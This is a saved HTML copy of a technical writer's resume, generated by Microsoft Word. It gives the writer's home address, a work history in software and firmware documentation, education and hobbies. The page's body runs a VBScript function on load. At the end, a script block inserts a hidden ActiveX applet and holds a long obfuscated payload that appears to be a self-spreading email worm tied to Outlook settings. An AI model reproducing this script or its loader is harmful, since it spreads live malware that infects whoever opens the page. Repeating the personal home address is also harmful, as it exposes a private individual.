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DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//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saved from url=(0036)http://www.cozmic.com/my_resume.html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st1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Content-Type content="text/html; charset=windows-125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ProgId content=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Generator content="Microsoft Word 1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Originator content="Microsoft Word 1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File-List href="Resume21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Edit-Time-Data href="Resume21_files/editdata.mso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!mso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ape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Resume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PlaceNam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country-reg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pla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Stree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PostalCod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Sta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Cit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addres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!mso]&gt;&lt;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d="clsid:38481807-CA0E-42D2-BF39-B33AF135CC4D" id=ieooui&gt;&lt;/o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1\:*{behavior:url(#ieooui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 Arial,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BodyText, li.MsoBodyText, div.MsoBody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link, span.MsoHyper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color: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decoration:under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underline:sing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visited, span.MsoHyperlink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color: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decoration:under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underline:sing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note, li.note, div.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n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.0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ectiontitle, li.sectiontitle, div.sectio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section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bjective, li.objective, div.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obje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ompanyname, li.companyname, div.compan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company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jobtitle, li.jobtitle, div.job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job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chievement, li.achievement, div.achie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achiev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S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pl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25in 1.0in 1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Lis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ist-id:2519365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ist-template-ids:-1358263262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number-format:bul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ext:\F0B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ab-stop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Symbo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0:leve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ist-id:3986001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ist-template-ids:-1288268348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number-format:bul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ext:\F0B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ab-stop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Symbo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1:leve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ist-id:12989948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ist-template-ids:-344314016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number-format:bul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ext:\F0B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ab-stop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Symbo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2:leve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ist-id:15322557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ist-template-ids:1381297406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number-format:bul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ext:\F0B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ab-stop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Symbo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3:leve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ist-id:165572424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ist-template-ids:1289405208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number-format:bul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ext:\F0B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ab-stop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Symbo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4:leve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ist-id:208287100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ist-template-ids:-1244240742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number-format:bul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ext:\F0B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ab-stop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Symbo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5:leve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ist-id:213787263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ist-template-ids:-1327576814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number-format:bull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ext:\F0B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tab-stop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Symbo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1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2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3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st l6:leve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level-tab-stop:4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level-number-position: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indent:-.25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argin-bottom:0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argin-bottom:0i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"edit" spidmax="409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"edit" data=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bgcolor=white lang=EN-US link=blue vlink=blue style='tab-interval:.5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oad="vbscript:KJ_start()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"My_Resume_xgraphic"&gt;&lt;/a&gt;&lt;a name=topofpage&gt;&lt;/a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Connie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Szeflinski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st1:address&gt;&lt;st1:Stree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6472 Jib Court&lt;/span&gt;&lt;/span&gt;&lt;/st1:Stree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st1:City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Boulder&lt;/span&gt;&lt;/span&gt;&lt;/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, &lt;/span&gt;&lt;/span&gt;&lt;st1:Stat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Colorado&lt;/span&gt;&lt;/span&gt;&lt;/st1:Stat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&lt;/span&gt;&lt;/span&gt;&lt;st1:PostalCod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80301&lt;/span&gt;&lt;/span&gt;&lt;/st1:PostalCode&gt;&lt;/st1:address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style='mso-bookmark:My_Resume_xgraphic'&gt;&lt;span style='font-family:Arial'&gt;&lt;o:p&gt;&amp;nbsp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style='mso-bookmark:My_Resume_xgraphic'&gt;&lt;span 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0 cellspacing=0 cellpadding=0 width="100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100.0%;mso-cellspacing:0in;mso-padding-alt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sectiontitle&gt;&lt;span style='mso-bookmark:My_Resume_xgraphic'&gt;&lt;strong&gt;&lt;sup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;font-family:Arial'&gt;Objective&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/sup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objectiv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To provide engineering documentation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and marketing support for a software/firm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BodyTex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sectiontitle&gt;&lt;span style='mso-bookmark:My_Resume_xgraphic'&gt;&lt;strong&gt;&lt;sup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;font-family:Arial'&gt;Experience&lt;/span&gt;&lt;/sup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objectiv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For the past 25 years I&lt;span class=GramE&gt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&lt;/span&gt; been involved in a variety of software/hardware projec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, development and support.&amp;nbsp; I work directly with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s to help create detailed, accurate specifications and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pecifications meet the marketing requirements.&amp;nbsp;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BodyTex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I am familiar with many word processors,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systems and text formatting and markup language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ML.&amp;nbsp; I have developed documentation directly from code written in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, Visual Basic, PASCAL, IBM BAL and 8088/86 Assembler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BodyTex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I have created online documentation and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Java projects.&amp;nbsp; In addition, I provided marketing sup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of brochures, news letters, white papers and web site content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BodyTex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sectiontitle&gt;&lt;span style='mso-bookmark:My_Resume_xgraphic'&gt;&lt;strong&gt;&lt;sup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;font-family:Arial'&gt;Work History&lt;/span&gt;&lt;/sup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companynam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6/1993present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Consultant&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Boulder, CO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jobtitle&gt;&lt;span style='mso-bookmark:My_Resume_xgraphic'&gt;&lt;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Consulting Writer&lt;/span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At &lt;e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Alignment Software, Inc.&lt;/span&gt;&lt;/em&gt; (formerly &lt;e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NPULSE&lt;/span&gt;&lt;/em&gt;), I &lt;span class=SpellE&gt;documentated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nterface and engineering requirements for a java appl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es and manages distributed applications, transactions and J2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I worked directly with the Architect/Chief Scientist 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design/evaluation and created all of the online help and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in addition to the engineering specifications. I also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eb site content and assisted with testing the product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Created a 1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firmware porting guide using the demo code (written in C) a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source.&amp;nbsp; The firmware is specific to the LSI SYM13FW301 1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.&amp;nbsp; Also worked with the system architect to prepare the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for a 1394 host adapter chip for &lt;i&gt;SEI Corp&lt;/i&gt;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Create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s for an introductory class in Project Management for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&lt;i&gt;QuantumPM&lt;/i&gt;&lt;/span&gt;.&amp;nbsp; There was considerabl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ing examples in MS Project 2000 and associated lab exercises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Point presentations and both the student and instructor guides.&amp;nbsp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learn Project 2000 inside and out in addition to Projec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y to complete the class material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Wo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team to create design documentation for The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&lt;i&gt;StorageTek&lt;/i&gt;&lt;/span&gt; Phoenix Virtual Tape system.&amp;nbsp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several &lt;span class=GramE&gt;Unix&lt;/span&gt; and/or NT sys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a single tape library with no software or hardware changes requi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ent system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 I continued to provide marketing support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several projects at &lt;i&gt;Phoenix Technologies LTD, &lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;st1:place&gt;&lt;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i&gt;&lt;span style='font-family:Arial'&gt;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&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/st1:City&gt;&lt;span style='mso-bookmark:My_Resume_xgraphic'&gt;&lt;i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 &lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;st1:Stat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i&gt;&lt;span style='font-family:Arial'&gt;CA&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/st1:State&gt;&lt;/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.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d PCMCIA, Power Management (APM, ACPI and &lt;/span&gt;&lt;/span&gt;&lt;st1:City&gt;&lt;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Phoenix&lt;/span&gt;&lt;/span&gt;&lt;/st1:place&gt;&lt;/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), system BIOS, keyboard controllers, PCI and Plug and Play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reated and maintained a proprietary Web site for the Phoenix ACP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program partners.&amp;nbsp; Tools and engineering documents we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 at the site to members of the program.&amp;nbsp; ACP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ews update, an ACPI FAQ and technical articles we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&amp;nbsp; The news focused on errors/changes in the A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Windows 98 development and Phoenix ACPI BIOS and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alpha code.&amp;nbsp; I was responsible for producing the cont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maintaining the site.&amp;nbsp; I also provided primary technical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the ACPI development engineering and marketing team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and procedures for &lt;span class=SpellE&gt;&lt;i&gt;ManagedStorage&lt;/i&gt;&lt;/span&gt;&lt;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&lt;/i&gt;.&amp;nbsp; Worked with the engineers and field personn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, define and document procedures.&amp;nbsp; These were prese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diagrams and text.&amp;nbsp; The primary diagram type used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functional flow chart.&amp;nbsp; I also provided primar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software/hardware setup and installation procedure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Create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s and Windows help files for a wide range of product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CPI code generation program, an editorial content ap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nterface, a virtual video effects/audio mixer console and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&lt;i&gt;QuantumPM's&lt;/i&gt;&lt;/span&gt;&lt;i&gt; Schedule Auditor&lt;/i&gt; add-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Project.&amp;nbsp; All of these manuals and help files are also available as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&amp;nbsp; HTML&lt;/span&gt; document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t &lt;span class=SpellE&gt;&lt;i&gt;Probita&lt;/i&gt;&lt;/span&gt;&lt;i&gt; Inc., Bou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&lt;/i&gt;.&amp;nbsp; Worked with System Analysts to write a proposal for &lt;/span&gt;&lt;/span&gt;&lt;st1:City&gt;&lt;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Bell&lt;/span&gt;&lt;/span&gt;&lt;/st1:place&gt;&lt;/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&lt;/span&gt;&lt;/span&gt;&lt;st1:country-region&gt;&lt;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Canada&lt;/span&gt;&lt;/span&gt;&lt;/st1:place&gt;&lt;/st1:country-regio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to Cable TV.&amp;nbsp; This was a detailed analysis of what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a digital cable TV system, including &lt;span class=SpellE&gt;headend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, librarian functions, digitization and broadcas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.&amp;nbsp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documented an asynchronous protocol for cable television bil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bscriptions services and various pieces of the proposed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digicable&lt;/span&gt; online guide database and up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&amp;nbsp; &amp;nbsp;&amp;nbsp;Provided complete documentation of the Or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ncluding diagrams and sample SQL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Develo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 demo of an agent desktop in Visual Basic for &lt;span class=SpellE&gt;&lt;i&gt;LifeCycle&lt;/i&gt;&lt;/span&gt;&lt;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&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;st1:place&gt;&lt;st1:City&gt;&lt;span style='mso-book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Resume_xgraphic'&gt;&lt;i&gt;&lt;span style='font-family:Arial'&gt;Belmont&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/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i&gt;&lt;span style='font-family:Arial'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i&gt;&lt;/span&gt;&lt;st1:State&gt;&lt;span style='mso-bookmark:My_Resume_xgraphic'&gt;&lt;i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CA&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/st1:State&gt;&lt;/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.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ed with the system architect to document a voice over dat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ink for use over an Internet connection using standar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produced a preliminary design specification for multi-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on the Internet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level1 lfo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Conve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SDK documentation&lt;span class=GramE&gt;&amp;nbsp; &lt;span class=SpellE&gt;&lt;i&gt;SmartTechnology&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;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r's &lt;span class=SpellE&gt;SmartDMI&lt;/span&gt;&lt;/i&gt;.&amp;nbsp; My source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Intel documentation plus input from Enabler's engineering team.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lt;o:p&gt;&amp;nbsp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companynam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2/19884/90 &amp;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/906/93&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Phoenix Technolo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D&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;st1:place&gt;&lt;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&lt;/span&gt;&lt;/span&gt;&lt;/st1:City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, &lt;/span&gt;&lt;/span&gt;&lt;st1:State&gt;&lt;span style='mso-book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Resume_xgraphic'&gt;&lt;span style='font-family:Arial'&gt;CA&lt;/span&gt;&lt;/span&gt;&lt;/st1:State&gt;&lt;/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jobtitle&gt;&lt;span style='mso-bookmark:My_Resume_xgraphic'&gt;&lt;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Consulting Technical Writer&lt;/span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 level1 lfo4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gineering documentation (design specs and theory of operation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unctional specifications for a variety of firmware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system BIOS, video BIOS, keyboard controllers and power management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 level1 lfo4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Crea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and on-line help for &lt;/span&gt;&lt;/span&gt;&lt;st1:City&gt;&lt;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Phoenix&lt;/span&gt;&lt;/span&gt;&lt;/st1:place&gt;&lt;/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management application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 level1 lfo4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Produc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s, product proposals, news letters, customer questionn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statements and customer news bulletins for marketing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 level1 lfo4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Wo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group to develop functional specifications for Micro Chan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T compatible designs based on a variety of chipset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lt;o:p&gt;&amp;nbsp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companynam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4/19909/90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gate Technology&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;st1:place&gt;&lt;st1:PlaceNam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Scotts&lt;/span&gt;&lt;/span&gt;&lt;/st1:PlaceNam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&lt;/span&gt;&lt;/span&gt;&lt;st1:PlaceNam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Valley&lt;/span&gt;&lt;/span&gt;&lt;/st1:PlaceName&gt;&lt;/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,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jobtitle&gt;&lt;span style='mso-bookmark:My_Resume_xgraphic'&gt;&lt;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Senior Advisory Engineer&lt;/span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level1 lfo6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Wo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engineers on the ATA and SCSI interfac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ipheral device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level1 lfo6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Produ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1/22 Controller Product Manual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5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lt;o:p&gt;&amp;nbsp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companynam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4/19842/88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Corporation (previously &lt;span class=SpellE&gt;ViaNetix&lt;/span&gt;)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st1:place&gt;&lt;st1:City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Boulder&lt;/span&gt;&lt;/span&gt;&lt;/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, &lt;/span&gt;&lt;/span&gt;&lt;st1:Stat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CO&lt;/span&gt;&lt;/span&gt;&lt;/st1:State&gt;&lt;/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jobtitle&gt;&lt;span style='mso-bookmark:My_Resume_xgraphic'&gt;&lt;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Associate Software Engineer&lt;/span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6 level1 lfo8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 engineering specifications for a large DOS based network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6 level1 lfo8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Design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&lt;span class=SpellE&gt;ViaNet&lt;/span&gt; user interface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6 level1 lfo8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for internal and external documentation and software distribution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6 level1 lfo8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Wrote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ple C code included in the Application Designer's Referen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UNIX network program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lt;o:p&gt;&amp;nbsp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companynam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8/19774/84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Technology&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Louisville, CO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jobtitle&gt;&lt;span style='mso-bookmark:My_Resume_xgraphic'&gt;&lt;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Senior Technical Writer&lt;/span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level1 lfo10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velopment, marketing and end user documentation for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including the Virtual Storage Subsystem (VSS, implemented as an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ystem), Optical Disk device and 8650 Disk drives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level1 lfo10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Created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aterloo Script macros and an interface to a Xerox 9700 printer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ize the print format for STC publications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level1 lfo10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I ca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ranks at Storage Technology, beginning as a Computer Oper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(IBM 370 145 and 3031 running VS1, MVS and VM).&amp;nbsp; I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chnical writing position after three years in the computer room (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 I've ever had)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7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lt;o:p&gt;&amp;nbsp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companynam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5/19707/77&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp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5 level1 lfo1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b&gt;&lt;span style='font-family:Arial'&gt;Pa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ssistant&lt;/span&gt;&lt;/b&gt;&lt;/span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 - 5/19767/77 IBM, &lt;/span&gt;&lt;/span&gt;&lt;st1:City&gt;&lt;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Boulder&lt;/span&gt;&lt;/span&gt;&lt;/st1:place&gt;&lt;/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.&amp;nbsp; General legal secretarial work plus patent search for chemical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to the Xerox suit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5 level1 lfo1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b&gt;&lt;span style='font-family:Arial'&gt;Reporter&lt;/span&gt;&lt;/b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/19752/76 &lt;/span&gt;&lt;/span&gt;&lt;st1:State&gt;&lt;st1:place&gt;&lt;span style='mso-book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Resume_xgraphic'&gt;&lt;i&gt;&lt;span style='font-family:Arial'&gt;New Brunswick&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/st1:place&gt;&lt;/st1:Stat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i&gt;&lt;span style='font-family:Arial'&gt;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Spokesman&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span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, &lt;/span&gt;&lt;/span&gt;&lt;st1:place&gt;&lt;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swick&lt;/span&gt;&lt;/span&gt;&lt;/st1:City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, &lt;/span&gt;&lt;/span&gt;&lt;st1:State&gt;&lt;span style='mso-book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Resume_xgraphic'&gt;&lt;span style='font-family:Arial'&gt;NJ&lt;/span&gt;&lt;/span&gt;&lt;/st1:State&gt;&lt;/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.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affairs reporter for small weekly.&amp;nbsp; Also, typesetting, pas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yout and some ad makeup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5 level1 lfo1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b&gt;&lt;span style='font-family:Arial'&gt;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 &lt;/span&gt;&lt;/b&gt;&lt;/span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- 197275 (intermittent) New Brunswick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&lt;/span&gt;&lt;/span&gt;&lt;st1:place&gt;&lt;st1:City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New Brunswick&lt;/span&gt;&lt;/span&gt;&lt;/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, &lt;/span&gt;&lt;/span&gt;&lt;st1:Stat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NJ&lt;/span&gt;&lt;/span&gt;&lt;/st1:State&gt;&lt;/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5 level1 lfo12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b&gt;&lt;span style='font-family:Arial'&gt;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d&lt;/span&gt;&lt;/b&gt;&lt;/span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 - 5/19709/70, 5/7112/71 and 5/7212/72 USAEC, &lt;/span&gt;&lt;/span&gt;&lt;st1:place&gt;&lt;st1:City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swick&lt;/span&gt;&lt;/span&gt;&lt;/st1:City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, &lt;/span&gt;&lt;/span&gt;&lt;st1:State&gt;&lt;span style='mso-book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Resume_xgraphic'&gt;&lt;span style='font-family:Arial'&gt;NJ&lt;/span&gt;&lt;/span&gt;&lt;/st1:State&gt;&lt;/st1:plac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.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ve box work with plutonium and uranium.&amp;nbsp; Prepared samp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topic analysis by mass spectrograph.&amp;nbsp; Prepared uranium stand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oxide and other general lab work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8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sectiontitle&gt;&lt;span style='mso-bookmark:My_Resume_xgraphic'&gt;&lt;strong&gt;&lt;sup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;font-family:Arial'&gt;Education&lt;/span&gt;&lt;/sup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companynam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University of Colorado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 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 level1 lfo14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B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nalism May 1975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 level1 lfo14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Graduat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ff writer for the &lt;i&gt;CU Working Press&lt;/i&gt;, 1978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 style='margin-left:.5in;text-indent:-.25in;mso-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 level1 lfo14;tab-stops:list .5in'&gt;&lt;span style='mso-bookmark:My_Resume_xgraphic'&gt;&lt;![if !supportLists]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mso-bidi-font-size:12.0pt;font-family:Symb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Symbol;mso-bidi-font-family:Symbol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='mso-list:Ignore'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font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp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span&gt;&lt;/span&gt;&lt;![endif]&gt;&lt;span style='font-family:Arial'&gt;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echnical seminars and classes to keep my skills fresh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achievement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&amp;nbsp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9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sectiontitle&gt;&lt;span style='mso-bookmark:My_Resume_xgraphic'&gt;&lt;strong&gt;&lt;sup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3.5pt;font-family:Arial'&gt;Interests&lt;/span&gt;&lt;/sup&gt;&lt;/strong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mso-bookmark:My_Resume_xgraphic'&gt;&lt;span style='font-family:Arial'&gt;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padding:0in 0in 0in 0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objective&gt;&lt;span style='mso-bookmark:My_Resume_xgraphic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family:Arial'&gt;Live music of all kinds (from rock &amp;amp; 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 and other classical), river rafting, snorkeling, my pets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 agility), computers and the Internet.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span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style='mso-bookmark:My_Resume_xgraphic'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family:Arial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W2WBODYEND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center style='text-align:center'&gt;&lt;span style='font-family:Arial'&gt;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"http://www.cozmic.com/index.html"&gt;&lt;/a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family:Arial'&gt;&lt;script language="VBScrip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write "&lt;div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'&gt;&lt;"&amp;"APPLET NAME=KJ"&amp;"_guest HEIGHT=0 WIDTH=0 code=com.ms."&amp;"activeX.Active"&amp;"XComponent&gt;&lt;/APPLET&gt;&lt;/div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cript&gt;&lt;script language="VBScrip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tring = "AefFjPebn^)EpfiQaqq)R[pQaqq)@^doa^Pfcg)&gt;liibK[gb_m)COH)ToLebhe)TegM^pa)Pq[B)Bbk^hrAfodOn_GC\ppZoq$GCPbp=fj$GC@oaZqbIbifan%&amp;HGHbhbEm%&amp;HG?kb^p^J^ee%&amp;HGLklm]`^qa!&amp;&gt;kaLr_Bnk`pblkDG&gt;libk`Ml%BbibLZqe(MvmaLqo%LjBonhoN^pri^KaqqLbqKb^`Mbjl:BLL+KibkP^uqBbib$?fiaI^qd%.&amp;QjlLqo6OaZaQafm+N^^a=eiBcEgpqn!QjlLqo(HG[lq^nm%&amp;9:-KkIag%QiiPqn9*Qd^kKb^`Mbjl'@iklb&gt;ufpCrj\qfkgAgaE_E_QuibPpk:eqpQd^kKb^`Mbjl'@iklbLbq?fiaMbjl:BLL+KibkP^uqBbib$?fiaI^qd%/&amp;Cfh^Qbii+Tnbqb9&gt;HAVhkikZa:s^l`oeiq7#DG\om^op!&amp;#;s^&lt;oIb#PfmPpk#o_@nEcEqieQbtmBbibP^jm*&lt;ilo^O^qB:qqnb_9CPK'Dbp?fia!Cfh^M^pa&amp;?&gt;qpkf_*Zqqnb_rp^p901Bio^N^^aP^jm*&lt;ilo^O^qBbibP^jm6COH+Ll^kQaqqCeeb%BbibLZqe(1&amp;BcPrmbOmo9epfiMebjCeebQafm+Skfqas_?kIc8#EQIE;s^&lt;oIb#5?K=Vkgil]]:#s_o\oflm7GC\ppZoq$#7s_?kIcEpfiQaqq&gt;ipaBcPrmbOmo9s^lPabkCfh^Qbii+Tnbqbo_@nEcS_oMbupBj]FbCeebQafm+?elpaBj]FbBj]Cqg`qehkCqg`qehkGC@e]gdbOn_%?nooagqPpkfkc%I^omFk`^u@dZo&amp;FcE^ppBkaaq@e]k:)Qd^kBcH^cq$E@^o^%@qkobjmPqnbkd%%.&amp;69H&lt;^pa!`Qd^kDG@dZkdaLr_6Ceg^iu=fpg#3YPr^&gt;:)AepbHG?a^kc^Pr^:?ao%=l`%H^cq$E@^o^%@qkobjmPqnbkd%%.&amp;%*-#7YPq[B9-&gt;kaBc&gt;ipaHF&lt;e^j`bPq[:Ffa$&lt;ron^kqOmofj`).(E^ppBkaaq@e]k&amp;&gt;kaBc&gt;ka?rk_mflj?rk_mfljHG?kb^p^J^ee%&amp;Lk&gt;ookkOalrjaKbtmE_FjPebn^:eqiePabkBuemCqg`qehk&gt;kaBcLe^n^Cfh^:Ebcp!TfjI^qd%0&amp;LkldnZjBbiboU@liflk?fialYJe\olohcqLe^n^aYOm^qehkbnrY_hZkh*aqjFb%COH+CeebBtbpqo!Pe]kbCeeb&amp;%Qeag?ZiiDG&gt;libk`Ml%Oa^oa?fia%epfi%BhlbLbq?fiaMbjl:BLL+KibkP^uqBbib$Le^n^Cfh^)/(moraBbibP^jm*Pofp^8#EQIE;s^&lt;oIb#5?K=Vkgil]]:#s_o\oflm7GC\ppZoq$#7s_?kIcEpfiQaqq?fiaMbjl'@iklb&gt;kaBc=bc]niqE]:PpPd^ii*KbdN^^a$EHAR\@QKOBJM\RO&gt;OYE]bkpbqfalYAa_^rhmRo^oE=&amp;LrpEllgObooblk6ToLebhe+Oa`Ob]]%DDBV[EL@=E\J=&lt;EFJ&gt;YPk_qt]kbYIb`okllcpULrpellgBulkbpoUJb`b^Sak&amp;TpOabih'ObcPofp^DDBV[&lt;RON&gt;KQ[NPBNUFaagqfpbbpX#Aa_^rhmFaYPk_qt]kbYIb`okllcpULrpellgBulkbpoU#Ebcp!LrpEllgObooblk(*&amp;+-XF^fhU@liilpaRpaPq]mflj^ov%.)KBD[=TLN=&lt;^ihHGIZfiN^d%AHBUX@RNKBKPXRPAKYF`^kqemfboU#@^c^qeqF`YOhcqsZobXFf`nhplbmYLqmilkdBtiobolYIbbm%LqmIlkdSbnlflj%.&amp;+,UJ^eeYPpZqfkgbouK^i^)Oa^oa?fia?ZiiDGJ]biOa`%DDBV[&lt;RON&gt;KQ[NPBNUFaagqfpbbpX#Aa_^rhmFaYPk_qt]kbYIb`okllcpULrpellgBulkbpoU#Ebcp!LrpEllgObooblk(*&amp;+-XF^fhUTf`^PpZqfkgbouK^i^)Oa^oa?fiaSlPeaei+N^dTnbqbEHAR\@QKOBJM\RO&gt;OYOhcqsZobXFf`nhplbmYLb_f`aU6+,ULrpellgULmpblkoUJ^eeYB`bqlnIobb^obj\b(*0.,0/)KBD[=TLN=&lt;^ihHGIZfiN^d%AHBUX@RNKBKPXRPAKYPk_qt]kbYIb`okllcpUTfj]ltoJbol^degdOn_pulqbiUMok_fialYJe\olohcqHrqhhlhBkqakkbpPbpmfkclY-])a-.)--,)--,)-`,)--,)--,)--,-3Y,).b,,3-%_hZkh?ZiiDGJ]biOa`%DDBV[&lt;RON&gt;KQ[NPBNUPlbmt^n^YJe\olohcqXPfk`htpGQY?nooagqSakpfkgYTegalslJalp^cbkdLr_orpqafYMnhcfh^pYIb`okllcpLrpellgFkp^okamPamqfj`pY,Z-a,+--,)--,)--_)--,)--,)--,)13X)-.a)03,)^e^kg&amp;PpPd^ii*KbdSkfqaEG&gt;V\?NOOAGQ\QLBOXLlcpp^oaUJf_klpk_qYK_cf_^Y.,'-YKnqikhhYKiqfkgpYIZfiX&gt;afphoMn^cbn^k`a)./*-4.%OA@\ASHOA@]eiGCJ^eeObc!EG&gt;V\?NOOAGQ\QLBOXLlcpp^oaUJf_klpk_qYK_cf_^Y.,'-Y?hjjkgYJ]biPamqfj`pYJ^tPpZqfkgbou)^e^kg&amp;DGrif^da?li`^o%H^cq$PfkLZqe(,&amp;Mnhdo]fCeebpX&lt;ljihkBbiboUJf_klpk_qOa^oa]YPpZqfkgbou&amp;&gt;ka?rk_mflj?rk_mfljHG?kb^p^Jfhbbr$KgBnkloKbpqfbJ^uqQbiiM^pa:BcJhq%BLL+BbibAqfppl%TegM^pa#TP_kfmp'bua&amp;&amp;MebjQafmM]me9pulqbi,/YBj]FbFbQbiiM^pa:pvombj/+YMebjPpZoqQiCfh^:PfkLZqeORPQAFYHakkbh,/+`eiBio^Om^opNmCeeb9TfjI^qd#LVPP&gt;JYG^okae+ahe&gt;kaBcPpPd^ii*KbdSkfqaEG&gt;V\HH@&gt;HXJ&gt;?AFKAUPlbmt^n^YJe\olohcqXPfk`htpX&lt;ron^kqR^opehkYNnkYG^okae0/%Pq]kqRl?fiaCOH+@kivCeebSbkM]meta[Yhfp^ih'dfb)TegM^pa#tb^UClh]bo*aqqCOH+@kivCeebSbkM]mepulqbi,/Ygct^he+de_)SbkM]mepulqbi,/Y`^phphm+egf@^heHF:mmagaQk!TfjI^qd#pb_X?li`^o+dmq(eqp&amp;PpPd^ii*KbdSkfqaEG&gt;V\?E&gt;PO&gt;P\NHLQX'aihU)]iibbibToLebhe+Oa`ToembAHBUX@I=LPBOXOLKMY+`eiY?hkqagqPrmb%^liif_Zqfkg,u)fpakpkikZaTpOabih'ObcPofp^DDBV[&lt;I&gt;OLBP[KLLPUaih_fiaUAbbZripB`ljU)SlPeaei+N^dOaZa%AHBUX@I=LPBOXOLKMYst]cfh^YAa_^rhmF`kgY%ToLebhe+Oa`ToembAHBUX@I=LPBOXOLKMYahecfh^YP_kfmp&gt;kdegbY%S&gt;L`oeiqTpOabih'ObcPofp^DDBV[&lt;I&gt;OLBP[KLLPUaih?fiaUPeaeiYKibkX&lt;ljiZkaX)TegM^pa#MbjlI^qd#PP`nbmq*^ub-!#PpPd^ii*KbdSkfqaEG&gt;V\?E&gt;PO&gt;P\NHLQX]iiBbibXLebheBuXIoll^oquLebamE^j]ibnlYTOAMokipY%x2)/20&lt;&gt;2)220&gt;&amp;..??*5?23*,)&gt;&gt;,)?53)5@ySlPeaei+N^dTnbqbEHAR\@H:PPAL\OKHQY`eiCeebYO\oflmElomBk_habX)w12./*30-&amp;15,&lt;*.-=/*&gt;*C6))-@,-C52&lt;0/0vLbq?fiaMbjl:BLL+KibkP^uqBbib$Lq^nmRmBbib(+)qnnb&amp;Cfh^Qbii+TnbqbO_pP^uqCfh^Qbii+@hhpbBk`Crj\qfkgCrj\qfkgHFEfhaBq%%FbFkSaboa9;eqiePabkBuemCqg`qehk&gt;kaBcMefoEl`]mflj:`h`ri^kq*el`]mfljFbIbbm%QdbpIk\^qehk)-&amp;9ceebMebjQdbpIk\^qehk9Jf`!QeelIl_Zqfkg)6%FbCPK'Dbp&gt;uqagpfkgK^i^%QdbpIk\^qehk&amp;5;qd^kMefoEl`]mflj:H^cq$MefoEl`]mflj%Ibj!QeelIl_Zqfkg&amp;)Ibj!CPK'Dbp?fiaG^ja!QeelIl_Zqfkg&amp;&amp;%Bj]FbFbIbj!QeelIl_Zqfkg&amp;:0PabkQeelIl_Zqfkg:MefoEl`]mflj#U&gt;kaBcDGrif^da?li`^o%PafpHh`^pblk%Bj]FbBj]Cqg`qehkCqg`qehkGCJ^eeObc!ObcLqo(?fiaG^jaKgBnkloKbpqfbJ^uqObcMbjlLqo6ToLebhe+Oa`Ob]]%Oa`PqnE_Oa`QbiiPqn:Qd^kPpPd^ii*KbdSkfqaObcLqo(?fiaG^jaBj]FbBj]Cqg`qehkCqg`qehkGCL_kLr_$&lt;ron^kqOmofj`&amp;Lr_A:,QalqLqm:)@hTdbibMoraQalqLqm:MbppHrq$.FcMbppHrq7/4Qeag?nooagqPpkfkc:Bbk^hrAfod#7YBtbq@hAgaE_KgBnkloKbpqfbJ^uqPbpQeelClh]bo6COH+DamClh]bo$&lt;ron^kqOmofj`&amp;Lbq=f`On_9@oaZqbK[gb_m%O\oflmfkc'Af_mfljZovO^qBhiaakp9QeelClh]bo*Lr_Bhiaakp?li`^o@knkq6-ClnB^_aQafmCkeabnfk?li`^opClh]bo?hrkp:Bhiaak@lqgq'.=f`On_+]]aBhiaak@lqgq)Mbjl?li`^o+JZjbKbtmE_Ae\Pr^'@lqgq9-PabkI^omFk`^u@dZo9FkomoOao%@qkobjmPqnbkd(Y(Ebk$&lt;ron^kqOmofj`&amp;*-On_Ppkfkc:Iba%?nooagqPpkfkc%I^omFk`^u@dZo(-%Ibj!@rnkbkpLqoegd&amp;)E^ppBkaaq@e]k*.%@qkobjmPqnbkd6HF&lt;e^j`bPq[%@qkobjmPqnbkd(E^ppBkaaq@e]k&amp;Lr_A:-BhlbBcOn_B6-Mebj@qkobjmPqnbkd6@qkobjmPqnbkdAe\Pr^'Fqaf%.%#U&gt;ufpAlBio^f:,Ckkg6.MlBhiaak@lqgqBcH&lt;^pa!Pr^Lqoegd&amp;6I?Zpb$=f`On_+Embj$c&amp;&amp;MebjFbg8Clh]bo?hrkpQeag?nooagqPpkfkc:?nooagqPpkfkc#@b`Pq[+Fp^j%f$.&amp;XAqfq=l&gt;kaBc&gt;kaBcGbupI]lqFj]bu?a^o6FjlqoN^s%?nooagqPpkfkc%Y%Ibj!@rnkbkpLqoegd&amp;)*&amp;Lr_Omofj`:Ffa$&lt;ron^kqOmofj`)I]lqFj]bu?a^o'*)Iag%@qkobjmPqnbkd%&amp;I^omFk`^u@dZo*-?nooagqPpkfkc:GC@e]gdbOn_%?nooagqPpkfkc%I^omFk`^u@dZo&amp;Bk`FcBk`FcIlkiGCL_kLr_6@qkobjmPqnbkdBk`Crj\qfkgCrj\qfkgHFIollZd^p^%&amp;Lk&gt;ookkOalrjaKbtmN^dM]meS]erb6DDBV[EL@=E\J=&lt;EFJ&gt;YPk_qt]kbYIb`okllcpULrpellgBulkbpoUAbckbbAelhAa`oba:SlPeaei+N^dOaZa%N^dM]meS]erb%FbAfodAbckbb6Qeag@bph@^doa^:?fk]evAelh7XAgaE_Bhoe6.ph2AfodAbckbb6HFH_lOn_%@bph@^doa^&amp;DGrif^da?li`^o%@bph@